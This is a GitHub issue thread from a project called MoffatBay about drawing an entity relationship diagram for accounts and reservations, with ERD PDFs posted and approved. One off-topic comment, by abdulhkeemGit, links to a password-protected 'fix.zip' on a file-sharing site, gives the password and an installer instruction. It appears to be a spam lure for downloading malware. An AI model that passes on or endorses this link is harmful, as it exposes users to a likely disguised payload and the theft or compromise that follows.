### ISSUE TITLE
Create ERD for database

### ISSUE THREAD

**Issue by fffade** [fffade/MoffatBay#6]
We must create an entity relationship diagram for the Moffat Bay Database.

The ERD should include a table for accounts as well as a table for reservations.

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fffade** [comment]
[Moffat Bay ERD.pdf](https://github.com/user-attachments/files/16803868/Moffat.Bay.ERD.pdf)

**Comment by JKBRUIN** [comment]
ERD looks like it covers the requirements, confirming you're posted ERD.

**Comment by fffade** [comment]
[Moffat Bay Lodge ERD.pdf](https://github.com/user-attachments/files/17029876/Moffat.Bay.Lodge.ERD.pdf)

ERD updated to include Full Name column for reservations.
